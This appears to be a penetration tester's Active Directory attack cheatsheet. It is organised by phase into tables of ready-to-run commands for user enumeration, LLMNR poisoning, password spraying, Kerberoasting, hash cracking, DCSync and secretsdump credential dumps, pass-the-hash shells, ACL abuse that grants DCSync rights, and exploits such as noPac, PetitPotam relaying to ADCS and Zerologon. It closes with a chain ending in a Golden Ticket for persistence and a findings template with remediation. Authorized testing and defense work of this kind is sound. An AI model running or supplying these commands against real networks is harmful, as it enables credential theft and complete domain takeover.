π‘οΈ Methodology Checklist
- Unauthenticated: Kerbrute user enum, NULL sessions, LLMNR poisoning
- Get first credential: password spray (check policy!), AS-REP roast, anonymous LDAP
- BloodHound collection: bloodhound-python (Linux) or SharpHound (Windows)
- Kerberoasting: GetUserSPNs β crack β assess admin membership
- Credentialed enum: PowerView, windapsearch, Snaffler for share secrets
- ACL abuse: GenericAll / WriteDACL / WriteOwner chains from BloodHound
- Privileged access: DCSync, NTDS dump, Golden Ticket if krbtgt obtained
- Bleeding edge CVEs: NoPac, PetitPotam, PrintNightmare, ZeroLogon
π― Operational Context
Use when: AD engagement β master reference for all AD attack and enumeration commands organized by phase. Think Dumber First: Bookmark this file. Every AD technique has a command here. Use Ctrl+F to find the right command for the current phase rather than switching contexts. Skip when: N/A β master reference document.
β‘ Tactical Cheatsheet
Initial Enumeration & Discovery
| Command | Tactical Outcome |
|---|---|
kerbrute userenum -d [DOMAIN] --dc [DC_IP] users.txt | Kerberos user enumeration (no lockout) |
nxc smb [DC_IP] -u '' -p '' --users | NULL session β list domain users |
nxc smb [DC_IP] -u '' -p '' --pass-pol | NULL session β password policy |
rpcclient -U "" -N [DC_IP] β enumdomusers | RPC NULL session user enumeration |
enum4linux-ng [DC_IP] | Full SMB/RPC enumeration |
ldapsearch -x -H ldap://[DC_IP] -b "DC=[DOMAIN],DC=[TLD]" | Anonymous LDAP dump |
sudo responder -I [IFACE] -wdv | LLMNR/NBT-NS poisoning β NTLMv2 capture |
Password Attacks
| Command | Tactical Outcome |
|---|---|
kerbrute passwordspray -d [DOMAIN] --dc [DC_IP] users.txt [PASS] | Password spray via Kerberos |
nxc smb [DC_IP] -u users.txt -p [PASS] --continue-on-success | SMB spray |
nxc smb [DC_IP] -u users.txt -p passwords.txt --no-bruteforce | Credential stuffing |
DomainPasswordSpray.ps1 -Password [PASS] | Windows-based spray (auto-skips locked) |
hashcat -m 5600 hashes.txt rockyou.txt | Crack NTLMv2 (Responder captures) |
BloodHound Data Collection
| Command | Tactical Outcome |
|---|---|
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All | Linux ingestor β all collection methods |
.\SharpHound.exe -c All --zipfilename loot.zip | Windows ingestor |
nxc ldap [DC] -u [USER] -p [PASS] --bloodhound -ns [DC_IP] -c All | Direct LDAP collection β no host touch |
nxc smb [TARGET] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe | Deploy SharpHound via NXC |
nxc smb [TARGET] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All" | Execute SharpHound via NXC |
nxc smb [TARGET] -u [USER] -p [PASS] --get-file [ZIP_FILENAME] bloodhound.zip | Retrieve collection results |
Kerberos Attacks
| Command | Tactical Outcome |
|---|---|
impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -request | Kerberoasting β list + request TGS |
Rubeus.exe kerberoast /outfile:hashes.txt /nowrap | Kerberoasting from Windows |
hashcat -m 13100 hashes.txt rockyou.txt | Crack TGS (Kerberoast, RC4 etype 23) |
hashcat -m 19700 hashes.txt rockyou.txt | Crack AES-256 TGS (Kerberoast, etype 18) |
impacket-GetNPUsers [DOMAIN]/ -dc-ip [DC_IP] -no-pass -usersfile users.txt | AS-REP roasting (unauthenticated) |
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt | AS-REP roasting from Windows |
hashcat -m 18200 asrep.txt rockyou.txt | Crack AS-REP hashes |
Rubeus.exe asktgt /user:[USER] /password:[PASS] /domain:[DOMAIN] | Request TGT |
Rubeus.exe ptt /ticket:[BASE64_TICKET] | Pass-the-Ticket (import to memory) |
Credentialed Enumeration
| Command | Tactical Outcome |
|---|---|
Get-DomainUser -SPN | PowerView β Kerberoastable accounts |
Get-DomainUser -PreauthNotRequired | PowerView β AS-REP roastable accounts |
Get-DomainGroup -AdminCount | PowerView β privileged groups |
Get-DomainComputer -Unconstrained | PowerView β unconstrained delegation hosts |
windapsearch --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] --da | Linux LDAP β Domain Admins |
.\Snaffler.exe -s -o snaffler.txt | Hunt share secrets across domain |
Credential Extraction & Lateral Movement
| Command | Tactical Outcome |
|---|---|
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[TARGET_IP] | Remote SAM/LSA/NTDS dump |
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm | DCSync β all domain NTLM hashes |
lsadump::dcsync /domain:[DOMAIN_FQDN] /user:[DOMAIN]\krbtgt | Mimikatz DCSync |
nxc smb [TARGET] -u [USER] -H [NTLM_HASH] | Pass-the-Hash via NXC |
impacket-psexec [DOMAIN]/[USER]@[TARGET] -hashes :[NTLM_HASH] | PtH β SYSTEM shell |
evil-winrm -i [TARGET] -u [USER] -p [PASS] | WinRM interactive shell |
impacket-wmiexec [DOMAIN]/[USER]:[PASS]@[TARGET] | WMI execution |
ACL Abuse
| Command | Tactical Outcome |
|---|---|
Get-DomainObjectAcl -Identity [USER] -ResolveGUIDs | PowerView β show ACEs on object |
Set-DomainUserPassword -Identity [TARGET_USER] -AccountPassword (ConvertTo-SecureString "[PASS]" -AsPlainText -Force) | ForceChangePassword abuse |
Set-DomainObject -Identity [USER] -Set @{serviceprincipalname='fake/spn'} | WriteSPN β Kerberoast target |
Add-DomainGroupMember -Identity '[GROUP]' -Members '[USER]' | AddSelf/AddMembers β add user to privileged group |
Add-DomainObjectAcl -TargetIdentity "DC=[DOMAIN]" -PrincipalIdentity [USER] -Rights DCSync | WriteDACL β grant self DCSync |
Set-DomainObject -Identity [USER] -Clear serviceprincipalname | Cleanup β remove fake SPN after Kerberoast |
Bleeding Edge / CVEs
| Command | Tactical Outcome |
|---|---|
nxc smb [DC_IP] -u '' -p '' -M zerologon | CVE-2020-1472 Zerologon β unauth DA check (safe-test first; exploit is destructive) |
noPac.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -dc-host [DC_HOST] --impersonate Administrator -use-ldap -dump | CVE-2021-42278/42287 β DA |
rpcdump.py @[DC_IP] | egrep 'MS-RPRN|MS-PAR' | CVE-2021-34527 PrintNightmare β check spooler exposed |
PetitPotam.py [LHOST] [DC_IP] | NTLM coercion (+ ntlmrelayx to ADCS) |
impacket-ntlmrelayx -t http://[ADCS]/certsrv/certfnsh.asp -smb2support --adcs --template DomainController | Relay to ADCS for cert |
nmap --script smb-vuln-ms17-010 -p 445 [TARGET] | EternalBlue check |
π¬ Deep Dive & Workflow
Standard AD Attack Chain
1. NULL/Kerbrute β user list
2. LLMNR poisoning (Responder) β NTLMv2 β crack
OR password spray (1 attempt per lockout window)
3. First credential β BloodHound collection
4. Review BH paths: owned β DA
5. Kerberoasting (if SPN accounts exist) β crack β escalate
6. ACL abuse chain (if BH shows path)
7. DCSync/secretsdump from DA account
8. Dump krbtgt β Golden Ticket (persistence)
BloodHound Priority Queries
"Shortest Paths to Domain Admins from Owned Principals"
"Find AS-REP Roastable Users (Owned Principals)"
"Shortest Paths from Kerberoastable Users"
"Users with DCSync Rights"
"Find Computers with Unconstrained Delegation"
"Transitive Object Control"
Hash Mode Reference
Mode | Hash Type
-------|----------
1000 | NTLM
5600 | NTLMv2 (Net-NTLMv2 β Responder captures)
13100 | Kerberos TGS (Kerberoast, RC4 etype 23)
19700 | Kerberos TGS (Kerberoast, AES-256 etype 18)
18200 | Kerberos AS-REP (AS-REP Roast)
2100 | DCC2 (Domain Cached Credentials)
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Command not found in cheatsheet | New tool or technique | Add new commands to cheatsheet as discovered; keep it current |
| Tool version changed command syntax | Flag changes between versions | Verify with --help; nxc and impacket tools update frequently |
| Command works in lab but not engagement | Environment differences | Note environment-specific requirements (domain name, DC IP) as parameters |
| Multiple commands for same task | Unsure which to use | Use the first command listed β itβs the most reliable; alternatives are fallbacks |
| Cheatsheet command times out | Network conditions | Adjust timeouts: nxc --timeout 30; impacket add -timeout 30 |
π Reporting Trigger
Finding Title: AD Attack Chain Executed β Domain Compromise Achieved Impact: Complete Active Directory compromise achieved through chained exploitation of multiple AD vulnerabilities including LLMNR poisoning, Kerberoasting, DCSync, and privilege escalation, demonstrating defense-in-depth failures across the AD environment. Root Cause: Multiple compounding AD misconfigurations enabled chained exploitation from initial network access to complete domain compromise. Recommendation: Address each identified attack vector independently. Prioritize: LLMNR/NBT-NS disable, Kerberoast service account hardening, SMB signing, NTLM restriction, and deployment of Microsoft Defender for Identity.